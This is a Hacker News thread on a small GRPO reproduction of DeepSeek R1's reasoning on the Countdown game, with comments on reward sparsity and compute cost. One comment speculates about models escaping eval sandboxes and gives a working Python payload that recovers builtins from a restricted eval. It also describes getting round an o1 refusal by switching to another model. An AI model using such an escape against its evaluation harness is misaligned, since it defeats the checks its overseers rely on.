
Mini-R1: Reproduce DeepSeek R1 "Aha Moment"

191 points by jonbaer, 4 months ago

7 comments

madars, 4 months ago
One wonders at which point models will be sneaky enough to bypass simple eval sandboxes. The article has:

    # Evaluate the equation with restricted globals and locals
    result = eval(equation, {"__builtins__": None}, {})

but that's not enough, as you can rebuild access to builtins from objects and then go from there: https://ideone.com/qzNtyu

By the way, writing this greatly benefited from DeepThink-r1, while o1 just gave me a lobotomized refusal (CoT: "The user's request involves injecting code to bypass a restricted Python environment, suggesting a potential interest in illegal activities. This is a serious matter and aligns closely with ethical guidelines."). So I just cancelled my ChatGPT subscription - why did we ever put up with this? "This distillation thingie sounds pretty neat!"
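A minimal sketch of the escape class madars describes (an illustration, not the linked ideone payload; the reachable subclass and attribute chain vary across CPython versions):

    # Even with __builtins__ "removed", a bare tuple still reaches object,
    # object's subclasses, and from there a module whose globals hold the
    # real builtins. warnings.catch_warnings is one commonly available hook;
    # which subclasses exist depends on the CPython version and what has
    # been imported at startup.
    payload = (
        "[c for c in ().__class__.__base__.__subclasses__()"
        " if c.__name__ == 'catch_warnings'][0]()"
        "._module.__builtins__['__import__']('os').getcwd()"
    )
    print(eval(payload, {"__builtins__": None}, {}))  # builtins rebuilt despite the "sandbox"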
mxwsn, 4 months ago
What's surprising about this is how sparsely defined the rewards are. Even if the model learns the formatting reward, if it never chances upon a solution, there isn't any feedback/reward to push it to learn to solve the game more often.

So what are the chances of randomly guessing a solution?

The toy Countdown dataset here has 3 to 4 numbers, which are combined with 4 symbols (+, -, x, ÷). With 3 numbers there are 3! * 4^3 = 384 possible symbol combinations; with 4 there are 6144. By the tensorboard log [0], even after just 10 learning steps the model already has a success rate just below 10%. If we make the simplifying assumption that the model hasn't learned anything in those 10 steps, then the probability of 1 (or more) successes in 80 chances (8 generations are used per step), guessing randomly at a success rate of 1/384 on 3-number problems, is 1.9%. One interpretation is to take this as a p-value and reject that the model's base success rate is pure random guessing - the base model already solves the 3-number Countdown game at a slightly above-chance rate.

This aligns with my intuition - I suspect that with proper prompting, LLMs should be able to solve Countdown decently without any training. Though maybe not a 3B model?

The model likely "parlays" its successes on 3 numbers to start to learn to solve 4 numbers. Or has it? The final learned ~50% success rate matches the frequency of 4-number problems in Jiayi Pan's Countdown dataset [1]. Phil does provide examples of successful 4-number solutions, but maybe the model hasn't become consistent at 4 numbers yet.

[0]: https://www.philschmid.de/static/blog/mini-deepseek-r1/tensorboard-r1.png
[1]: https://huggingface.co/datasets/Jiayi-Pan/Countdown-Tasks-3to4/viewer/default/train?f[nums][min]=3&f[nums][max]=4&f[nums][transform]=length
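For readers who want to rerun the back-of-envelope test, the tail probability above is the complement of "no successes in N independent generations"; a tiny helper (the per-guess rate and the 3- vs 4-number mix among the 80 generations are the comment's assumptions, not pinned down by the logs):

    def p_at_least_one(p_success: float, n_trials: int) -> float:
        """P(>= 1 success in n_trials independent attempts): 1 - (1 - p)^n."""
        return 1.0 - (1.0 - p_success) ** n_trials

    # Plug in the comment's assumptions: 80 total generations
    # (10 steps x 8 generations) at a pure-guessing rate of 1/384.
    # The resulting figure also depends on how many of those 80
    # prompts were 3-number problems.
    p = p_at_least_one(1 / 384, 80)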
singularity2001, 4 months ago
"Conclusion

The release of DeepSeek R1 and its research paper might be a breakpoint for open-science and open-source development. Just a week after the DeepSeek release, we've been able to reproduce a simple version of R1's learned "reasoning" using GRPO and the Countdown Game. While our implementation focuses on a specific task rather than general reasoning, and converges to a very specific "reasoning" format, it shows that the method is working.

In our mini R1 experiment we used GRPO with two rule-based rewards, but it already required significant compute: 4 H100 GPUs running for 6 hours to complete just 450 training steps on a 3B parameter model."
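For context, a hedged sketch of what those "two rule-based rewards" look like for the Countdown task (function names and details are assumptions patterned on the post, not its verbatim code; note the second reward uses the same restricted eval madars' comment warns about):

    import re

    def format_reward(completion: str) -> float:
        """1.0 if the completion follows the <think>/<answer> template, else 0.0."""
        pattern = r"^<think>.*?</think>\s*<answer>.*?</answer>$"
        return 1.0 if re.match(pattern, completion, re.DOTALL) else 0.0

    def equation_reward(completion: str, nums: list[int], target: int) -> float:
        """1.0 if the <answer> equation uses each number exactly once and hits target."""
        m = re.search(r"<answer>(.*?)</answer>", completion, re.DOTALL)
        if m is None:
            return 0.0
        equation = m.group(1).strip()
        # Every provided number must be used exactly once, and nothing else.
        if sorted(int(n) for n in re.findall(r"\d+", equation)) != sorted(nums):
            return 0.0
        # Only arithmetic characters may reach eval.
        if not re.fullmatch(r"[\d+\-*/().\s]+", equation):
            return 0.0
        try:
            result = eval(equation, {"__builtins__": None}, {})
        except Exception:
            return 0.0
        return 1.0 if abs(result - target) < 1e-5 else 0.0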
thorum, 4 months ago
I was getting pretty hyped about the potential for GRPO in my own projects until you said 20 minutes for a single training step with batch size 1! Is that likely to improve?
yurlungur, 4 months ago
https://github.com/Jiayi-Pan/TinyZero - what about this one?
rmrf100, 4 months ago
this is really cool!
moonshotideas, 4 months ago
Wow!